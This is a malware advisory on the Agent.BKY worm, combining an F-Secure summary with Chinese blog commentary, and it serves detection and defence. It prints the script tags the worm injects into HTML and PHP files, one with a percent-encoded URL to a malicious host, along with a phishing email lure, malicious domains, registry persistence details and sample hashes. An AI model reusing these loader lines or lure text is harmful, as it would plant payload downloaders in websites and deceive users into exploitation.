F-Secure Malware Information Pages: Agent.BKY
Radar Alert : Level 2
Name :  Agent.BKY
Alias: W32/Fujacks.aa, W32.Fubalca, ANIWorm, Trojan-Downloader.Win32.Agent.bky
Type: Worm, Trojan-Downloader
Category: Malware
Platform: Win32
Origin:China
Summary :
Agent.BKY is a worm and a trojan downloader. It infects .html, .php and some other files with a small script that points to a website, hosting a file with the recently discovered ANI exploit. The worm also spreads to remote and removable drives, modifies HOSTS file and downloads more malicious files onto an infected computer. This malware is similar to the worm that we detect as 'Worm:W32/Anito.A'.
一个非常不好的消息要告诉大家，利用微软动画光标ANI漏洞的新蠕虫已经现身。收到了相关的样本，通过分析，已经确认这是一个复合型蠕虫，含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ANI漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高，F-Secure决定发布2007年首个全球2级病毒风险警报，提醒广大网友提高警惕！
中国博客网blogcn.com还有剑盟、cnbeta等网站被挂木马及维金蠕虫NewInfo.dll NewInfo.bak msmsgs.exe IDrivers.pif
建议大家屏蔽网址18dmm.com，cool.47555.com ，2007ip.com，microfsot.com，61.153.247.76【警告：目前该五个网站极度危险，切勿链接浏览！！！】上述网站利用当前无补丁的漏洞更新频繁！
蠕虫的大小在13K左右，会释放文件到以下目录：
%SYSTEM%\sysload3.exe
或
%SYSTEM%\sysbmw.exe
添加注册表键值：
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"
或
"System Boot Check"="%SYSTEM%\sysbmw.exe"
会发送邮件：

发件人： i_love_cq@sohu.com
主题：你和谁视频的时候被拍下的？给你笑死了！
正文：
看你那小样！我看你是出名了！
你看这个地址！你的脸拍的那么清楚！你变明星了！hxxp://macr.microfsot.com/<removed>/134952.htm
感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件，并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码：
<script src=hxxp://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>
需要注意的是：邮件和网页中包含的网址都含有利用.ani 0-day漏洞的恶意文件。

病毒还尝试通过U盘传播，在根目录下生成病毒副本tool.exe和自动播放文件autorun.inf。

在新的变种里发现作者去掉了感染网页文件的动作，这也将使得该病毒的传播范围大幅缩小。

F-Secure检测为Agent.BKY
Kaspersky检测为Trojan-Downloader.Win32.Agent.bky；
Symantec：W32.Fubalca
McAfee：W32/Fujacks.aa
瑞星：Worm.DlOnlineGames.a
金山毒霸：Worm.MyInfect.aa/Worm.MyInfect.af

目前收到样本的MD5值为：
e9100ce97a5b4fbd8857b25ffe2d7179
4ebca8337797302fc6003eb50dd6237d
99720c731d19512678d9594867024e7e
4f1d9bcff5dcd56b383f2393b1cdb7a0
8b1c23d1912bf9969e41b65823bfc98e
目前流传在网络上的非微软官方ANI补丁，对新的ANI代码无效了！大家等微软官方发补丁吧:-(

简单的地说，就是F-Secure宣布一个名为“Agent.BKY“的病毒为2级警报！该病毒既是蠕虫病毒，又是木马下载器，感染电脑后，还不停的下载其他更多的恶意病毒，发源地为：中国！
目前该病毒的新变种里，表达了作者对国内反病毒厂商瑞星的不满，显示辱骂瑞星内容：
Fuck Rui Xing!  xV4
Hello Rui Xing and kapersky!
I don't want to destroy any computers,I don't destroy any documents,I don't infect system files.Don't Kill me!! xV4
作者在蠕虫体内还表达了对卡巴斯基Kaspersky的不满：I hate AVP！
AVP即卡巴斯基原来的名称！F-Secure的四个杀毒引擎中有一套AVP引擎，即卡巴斯基引擎。